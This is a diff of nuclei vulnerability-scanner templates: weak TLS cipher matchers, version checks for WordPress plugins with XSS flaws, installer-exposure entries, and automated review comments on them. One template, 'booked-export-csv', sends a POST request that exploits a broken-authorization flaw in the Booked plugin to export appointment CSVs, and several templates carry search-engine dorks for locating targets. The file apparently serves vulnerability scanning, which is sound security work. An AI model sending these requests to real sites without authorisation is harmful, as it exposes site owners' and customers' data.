"TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - 
"TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - 
"TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls11 + max_version: tls11 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - 
"TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls12 + max_version: tls12 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + 
words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + 
- "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls13 + max_version: tls13 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - 
"TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - 
"TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or diff --git a/poc/other/advanced-backgrounds.yaml b/poc/other/advanced-backgrounds.yaml new file mode 100644 index 0000000000..1885e02889 --- /dev/null +++ b/poc/other/advanced-backgrounds.yaml 
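Review bot: `cwe-id: CWE-918` is Server-Side Request Forgery and has nothing to do with cipher-suite strength; CWE-327 (Use of a Broken or Risky Cryptographic Algorithm) is the fitting classification, and `severity: Low` is capitalised unlike the lowercase values elsewhere in this commit. Each `ssl` entry pins `min_version`/`max_version` to one protocol and then word-matches only the single `cipher` the server negotiated, so it reports at most one weak suite per protocol and cannot show that only strong suites are enabled, which is what the ASVS text in `description` claims to verify; a line such as `# only the server-preferred suite per protocol is inspected` would stop the template overclaiming. The tls13 entry reuses the pre-1.3 suite list, yet TLS 1.3 suites carry distinct `TLS_AES_*`/`TLS_CHACHA20_*` names, so apart from the `TLS_SHA256_SHA256`, `TLS_SHA384_SHA384` and `TLS_SM4_*` entries that block can never match — either note that it is intentional or give it a TLS 1.3-specific list. The same ~90-entry list is pasted four times verbatim, so a comment at the top that the four copies must be kept in sync is the least that is needed.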
@@ -0,0 +1,59 @@
+id: advanced-backgrounds
+
+info:
+ name: >
+ Advanced WordPress Backgrounds <= 1.12.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via imageTag Parameter
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/78e49869-5e7e-45f2-8239-4df18b28db53?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/advanced-backgrounds/"
+ google-query: inurl:"/wp-content/plugins/advanced-backgrounds/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,advanced-backgrounds,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/advanced-backgrounds/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "advanced-backgrounds"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.12.3')
\ No newline at end of file
diff --git a/poc/other/alma-installer.yaml b/poc/other/alma-installer.yaml
index 11d2bcece3..e2d134ba86
--- a/poc/other/alma-installer.yaml
+++ b/poc/other/alma-installer.yaml
@@ -4,6 +4,7 @@ info:
 name: Alma Installation Exposure
 author: DhiyaneshDK
 severity: high
+ description: Alma is susceptible to the Installation page exposure due to misconfiguration.
 metadata:
 verified: true
 max-request: 1
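Review bot: `description: >` is an empty folded scalar and `cvss-metrics:`, `cvss-score:` and `cve-id:` are all null, so a hit prints a finding with no description, no score, and a `cve` tag but no CVE id; fill them from the Wordfence entry in `reference` or remove the empty keys and the `cve` tag. The amcharts-charts-and-maps template later in this commit has the identical gaps. The `name` says `Authenticated (Contributor+)`, which an unauthenticated readme.txt version check cannot establish; a comment on the `dsl` matcher such as `# version inference only; exploitability needs a Contributor account` would keep that distinction visible in output triage.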
@@ -30,5 +31,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100db9fc8c36fee3f8f7feae1bd48eecbb442aa85813ad2eba1662ebb9daf8eabfe02210098764b8c24aa179075af150cd9062a2ba551c92c087facfbd5f57e97f153e1de:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c6250654d85fbaf80fbfeb1011ad7902c233e811ca4b2ecd51079239fd1d4998022100f44bc592a98719ffc09c63d53bbc99ce6798630a5618ca1693cf6aa6fda70b84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f.yaml b/poc/other/amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f.yaml new file mode 100644 index 0000000000..0453cbbfc0 --- /dev/null +++ b/poc/other/amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f.yaml 
@@ -0,0 +1,59 @@
+id: amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f
+
+info:
+ name: >
+ amCharts: Charts and Maps <= 1.4.4 - Reflected Cross-Site Scripting via Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3593e8-3840-4db0-8269-61bbcb50d569?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/amcharts-charts-and-maps/"
+ google-query: inurl:"/wp-content/plugins/amcharts-charts-and-maps/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,amcharts-charts-and-maps,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/amcharts-charts-and-maps/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "amcharts-charts-and-maps"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.4')
\ No newline at end of file
diff --git a/poc/other/bitrix24-installer.yaml b/poc/other/bitrix24-installer.yaml
index 41e6479438..2c3830eaa3
--- a/poc/other/bitrix24-installer.yaml
+++ b/poc/other/bitrix24-installer.yaml
@@ -4,6 +4,7 @@ info:
 name: Bitrix24 Installation Exposure
 author: DhiyaneshDK
 severity: high
+ description: Bitrix24 is susceptible to the Installation page exposure due to misconfiguration.
 metadata:
 verified: true
 max-request: 1
@@ -32,5 +33,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ce1befacf1d264da511b1b9fe5d9a16de9dae0f6781e61fdc49627f6a301e32d022100b2690f631e5c1e902bf77cceb1da7fbac7fd00596d01b225b1b30111dfc1bf72:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210091ee1386f473f7e0a8e534f84272c12cc950892a3524ab4bd88ba7b1343109db02206aa8ba2c3174fb8688acb3860aa67aba0c259635e2e1725512694e96f6f2640a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/booked-export-csv.yaml b/poc/other/booked-export-csv.yaml new file mode 100644 index 0000000000..4bcd32f37c --- /dev/null +++ b/poc/other/booked-export-csv.yaml 
@@ -0,0 +1,50 @@
+id: booked-export-csv
+
+info:
+ name: Booked < 2.2.6 - Broken Authentication
+ author: random-robbie
+ severity: high
+ description: |
+ The Booked plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions hooked via AJAX actions in versions up to, and including, 2.2.5. This makes it possible for authenticated attackers with subscriber-level permissions and above to execute several unauthorized actions.
+ remediation: Fixed in version 2.2.6
+ reference:
+ - https://codecanyon.net/item/booked-appointments-appointment-booking-for-wordpress/9466968
+ - http://boxyupdates.com/changelog.php?p=booked
+ - https://wpscan.com/vulnerability/10107
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: "wp-content/plugins/booked/"
+ publicwww-query: "/wp-content/plugins/booked/"
+ google-query: inurl:"/wp-content/plugins/booked/"
+ tags: wordpress,wpscan,wp-plugin,wp,booked,bypass
+
+http:
+ - raw:
+ - |
+ POST /wp-admin/admin-post.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ booked_export_appointments_csv=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "End Time"
+ - "Start Time"
+ - "Calendar"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/csv
+
+ - type: status
+ status:
+ - 200
+
+# digest: 490a0046304402200db5cb115b1bff83639450515ea6bf1a039f02fba337ac6d20ba4c2e9a0795f602200d97f3b9ea9d40eeec6b70cdc4d8f68747265ebc83fbc650f251b1ee75bb5e0f:922c64590222798bb761d5b6d8e72950
diff --git a/poc/other/caldera-c2.yaml b/poc/other/caldera-c2.yaml
new file mode 100644
index 0000000000..a3350a28c7
--- /dev/null
+++ b/poc/other/caldera-c2.yaml
